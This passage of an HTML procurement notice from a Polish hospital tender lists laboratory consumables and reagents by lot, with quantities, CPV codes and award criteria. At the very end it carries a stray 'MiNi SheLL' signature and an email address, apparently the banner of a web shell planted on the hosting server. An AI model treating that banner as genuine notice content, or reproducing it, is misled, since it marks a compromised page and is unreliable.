8. 	Łącznik do końcówek luer (multiadapter)	,		, j.m.	szt	, ilość	10 000
9. 	 Łącznik do gazometrii Adapter membrana	,		, j.m.	szt	, ilość	3 000
10. 	Probówko-strzykawka z EDTA	,	Objętość 9-10 ml	, j.m.	szt	, ilość	800
11. 	Strzykawka do gazometrii z heparyną litową zbalansowaną  wapniem, obj.1 - 2 ml	,	Objętość 1- 2 ml	, j.m.	szt	, ilość	4 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7, 33.19.25.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Drobny sprzęt laboratoryjny (4).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Butelka hodowlana sterylnie pakowana o poj 50 ml, pow 25 cm 2		szt.	1000
2.	Pipeta Pasteura plastikowa, o poj 3 ml z podziałką, niesterylna.		szt.	13000
3.	Końcówka bezbarwna MLA 250-1000 ?l		szt.	12500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Odczynniki dla Pracowni Biochemii do dzierżawionego analizatora biochemicznego Beckman Coulter/AU680.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 	Vankomycyna		 op 	3
 2. 	Calibrator Vancomycin		 op 	1
 3. 	Gentamycin		 op 	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Odczynniki  dla Pracowni Analityki Ogólnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 	Barwnik May Grunwalda	 , j.m.  	op	, ilość	16				, wielkość opakowania	500 ml
 2. 	Barwnik Giemsy	 , j.m.  	op	, ilość	10				, wielkość opakowania	500 ml
 3. 	Bufor fosporanowy ph 7,2 koncentrat	 , j.m.  	op	, ilość	8				, wielkość opakowania	500 ml
 4. 	Olejek imersyjny	 , j.m.  	op	, ilość	25				, wielkość opakowania	25 ml
 5. 	 Testy wieloparametrowe do oznaczania narkotyków w moczu (amfetamina, kokaina metamfetamina, morfina, benzodiazepiny,trójpierścieniowe antydepresanty,marichuana, opiaty, ekstazy (MDMA) 	 , j.m.  	 szt 	, ilość	500					
 6. 	Zestw do oznaczania krwi utajonej w kale (bez diety)	 , j.m.  	 test 	, ilość	500					
 7. 	Helicobacter Pylori test kasetkowy w kale	 , j.m.  	test	, ilość	700					
 8. 	Rotawirusy i adenowirusy w kale -  test kasetkowy	 , j.m.  	test	, ilość	1700					
 9. 	OdczynnikRosina	 , j.m.  	but.	, ilość	1				, wielkość opakowania	1but=100ml
 10. 	Odczynnik Ehrliha	 , j.m.  	but.	, ilość	4				, wielkość opakowania	1 but=500 ml
 11. 	Odczynnik Lugola	 , j.m.  	but.	, ilość	1				, wielkość opakowania	1 but=100 ml
 12. 	Sudan III	 , j.m.  	but.	, ilość	1				, wielkość opakowania	1 but=50 ml
 13. 	Odczynnik Pandiego	 , j.m.  	but.	, ilość	1				, wielkość opakowania	1 but=100 ml
 14. 	Odczynnik Samsona	 , j.m.  	but.	, ilość	1				, wielkość opakowania	1 but=100 ml
 15. 	ASO latex z kontrolami (+) i  (-)	 , j.m.  	op	, ilość	4				, wielkość opakowania	100 ozn.
 16. 	RF latex z kontrolami    (+) i (-)	 , j.m.  	op	, ilość	3				, wielkość opakowania	100 ozn.
 17. 	Kwas sulfosalicylowy cz.d.a. 2-hydrat	 , j.m.  	op	, ilość	3				, wielkość opakowania	1 kg
 18. 	Mononukleoza test kasetkowy	 , j.m.  	szt	, ilość	300					
 19. 	Sulfitest- paski do oznaczania siarczynów w moczu	 , j.m.  	op	, ilość	1				, wielkość opakowania	1op=100 szt
 20. 	Giardia lamblia - test EIA do badania lambli w kale	 , j.m.  	op	, ilość	7				, wielkość opakowania	1 op=96 test.
 21. 	Barwnik Grama	 , j.m.  	op	, ilość	3				, wielkość opakowania	1 op= 4 x 250 ml
 22. 	Mikroalbumina-test paskowy	 , j.m.  	szt	, ilość	250				, wielkość opakowania	1 op=25 szt
 23. 	Paski do moczu 10 parametrowe(ciężar właściwy,odczyn moczu, glukoza, białko, krew, leukocyty,azotyny, bilirubina, urobilinogen, aceton). Zapewnienie kontroli wewnątrzlaboratoryjnej STANDLAB  wraz z dostawą materiału kontrolnego do oceny oznaczeń paskowych  -poziom negatywny i pozytywny  raz na kwartał.	 , j.m.  	 test 	, ilość	18000				, wielkość opakowania	1op=100 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Odczynniki dla Pracowni Serologii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 	Odczynnik monoklonalny anty-A klon I	 , j.m. 	op	, ilość	12				, wielkość opakowania	10 but x 5 ml
 2. 	Odczynnik monoklonalny anty-A klon II	 , j.m. 	op	, ilość	12				, wielkość opakowania	10 but x 5 ml
 3. 	Odczynnik monoklonalny anty-B klon I	 , j.m. 	op	, ilość	12				, wielkość opakowania	10 but x 5 ml
 4. 	Odczynnik monoklonalny anty-B klon II	 , j.m. 	op	, ilość	12				, wielkość opakowania	10 but x 5 ml
 5. 	Odczynnik monoklonalny anty-D Blend	 , j.m. 	op	, ilość	15				, wielkość opakowania	10 but x 5 ml
 6. 	Odczynnik monoklonalny anty-D Rum	 , j.m. 	op	, ilość	13				, wielkość opakowania	10 but x 5 ml
 7. 	Surowica anty globulinowa poliwalentna płynna	 , j.m. 	op	, ilość	2				, wielkość opakowania	10 but x 5 ml
 8. 	Odczynnik  anty-IgG	 , j.m. 	op	, ilość	4				, wielkość opakowania	2 but x 2 ml
 9. 	PEG (20% r-r glikolu polietylenowego)	 , j.m. 	op	, ilość	4				, wielkość opakowania	2 but x 4 ml
 10. 	LISS -L(płynny)	 , j.m. 	op	, ilość	15				, wielkość opakowania	1 but/100ml
 11. 	Standard anty - D	 , j.m. 	op	, ilość	36				, wielkość opakowania	10 but x 2 ml
 12. 	PBS - buforowany roztwór soli fiziologicznej	 , j.m. 	butelka	, ilość	100				, wielkość opakowania	1 but x 500ml
 13. 	Konserwowane Krwinki Wzorcowe do układu ABO	 , j.m. 	zestaw	, ilość	48				, wielkość opakowania	Zestaw 3 x 4 ml
 14. 	Konserwowane Krwinki Wzorcowe do wykrywania przeciwciał	 , j.m. 	zestaw	, ilość	12				, wielkość opakowania	Zestaw 3 x 4 ml
 15. 	Konserwowane Krwinki Wzorcowe Opłaszczone do kontroli BTA	 , j.m. 	zestaw	, ilość	12				, wielkość opakowania	Zestaw 2 x 2  ml
 16. 	Standaryzowane Krwinki Wzorcowe  O RH +opłaszczone przeciwciałami anty-D	 , j.m. 	zestaw	, ilość	12				, wielkość opakowania	Zestaw 2 x 2  ml
 17. 	Surowica AB-koloid	 , j.m. 	op	, ilość	8				, wielkość opakowania	2 but x 5 ml
 18. 	Książka prób zgodnośi dla Laboratoriów	 , j.m. 	szt	, ilość	3					
 19. 	Książka badania grup krwi dla Laboratoriów	 , j.m. 	szt	, ilość	6					
 20. 	Książka obrotu krwią dla Szpitali	 , j.m. 	szt	, ilość	3					
Zamawiający wymaga Odczynniki monoklonalne w buteleczkach z zakraplaczem dla każdej buteleczki w formie zakrętki (nie ampułka).								
Każda seria zestawu krwinek wzorcowych musi być przed dostarczeniem skontrolowana przez producenta pod względem swoistości (dołączyć								
stosowne oświadczenie).								
Zamawiający zastrzega sobie prawo do kontroli dostarczonych dostaw odczynników pod względem spełniania kryteriów jakościowych								
zawartych w rekomendacjach Instytutu Hematologii i Transfuzjologii w Warszawie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 22.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Odczynniki dla Pracowni Cytometrii do Cytometru BD FACSCALIBUR firmy Becton Dicinson.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kulki kalibracyjne  ( FITC,PE,PercP,Unlabled) 25 t	, j.m.	op	, ilość	2
2.	 Kulki kalibracyjne APC /25 t	, j.m.	op	, ilość	2
3.	 Płyn do cytometru FACS Flow /20 l	, j.m.	op	, ilość	4
4.	Zestaw do immunofentypowania limfocytów krwi obwodowej zawierający: 1 fiolkę z przeciwciałami CD/3/8/45/4, 1 fiolkę z przeciwciałami CD/3/16+56/45/19 + płyn lizujący	, j.m.	op	, ilość	1
5.	Płyn do cytometru FACS Rinse / 5l	, j.m.	op	, ilość	1
6.	Płyn do cytometru FACS Clean / 5l	, j.m.	op	, ilość	1
7.	Płyn do przygotowania próbek FACS Cell Wash /5 l	, j.m.	op	, ilość	1
8.	Płyn do cytometru FACS  Shoutdown/5l	, j.m.	op	, ilość	1
9.	Probówki do cytometru FACS CALIBUR PS 5 ml konsternując/1000 szt	, j.m.	op	, ilość	1
10.	Probówki do cytometru FACS CALIBUR (12 x 75) PS z korkiem  po 1000 szt	, j.m.	op	, ilość	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Odczynniki dla Pracowni Biochemii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do oznaczania przeciwciał IgG anty glista ludzka metodą ELISA		op.	10					1 op=96 ozn..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Odczynniki dla Pracowni Cytogenetyki (1).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Podłoże kompletne do hodowli limfocytów	, j.m.	butelki	, ilość	40				 , wielkość opakowania 	1 op= 100 ml
2.	Kolcemid	, j.m.	butelki	, ilość	24				 , wielkość opakowania 	1 op= 10 ml
3.	Surowica cielęca	, j.m.	butelki	, ilość	6				 , wielkość opakowania 	1 op= 100 ml
4.	PBS koncentrat*10 ph 7,4	, j.m.	butelki	, ilość	4				 , wielkość opakowania 	1 op= 500 ml
5.	Podloże RPMI 1640  z L-Glutaminą i NaHCO	, j.m.	butelki	, ilość	15				 , wielkość opakowania 	1 op= 500 ml.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Odczynniki dla Pracowni Cytogenetyki (2).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Trypsyna		, j.m. butelki, ilość	2					1op=25 g
2.	Ksylen		, j.m. butelki, ilość	1					1op=1000ml.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Odczynniki dla Pracowni Wad Metabolicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Mozaika 4 substratów(hep2; watroba małpy,nerka szczura żoładek szczura)do wykrywania przeciwciał ANA, AMA, APCA, ASMA.		op	, ilość	4	
2.	Mozaika 2 substratów (jelito cienkie małpy,wątroba małpy do wykrywania przeciwciał;p/endomysium w klasie IgA.		op	, ilość	2	
3.	Mozaika 2 substratów (jelito cienkie małpy,wątroba małpy do wykrywania przeciwciał;p/endomysium w klasie IgG.		op	, ilość	4	
4.	Kontrole do oznaczania przeciwciał p/endomysium (+) w klasie IgG i IgA		op	, ilość	4	
5.	Test potwierdzający dla ANA metodą imunoblotu dla następujących antygenów; nRNP/Sm, SS-A, Ro-52,SS-B Scl-70, Jo-1, centromerowe białko C, PCNA, dsDNA, nukeosomy,histony, rybosomalne białko P, AMA M2		op	, ilość	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Odczynniki dla Pracowni Biochemii do aparatu Mini Bos.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do oznaczania 17 hydroksyprogesteronu metoda Elisa		op. ilość	4						1op=96 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com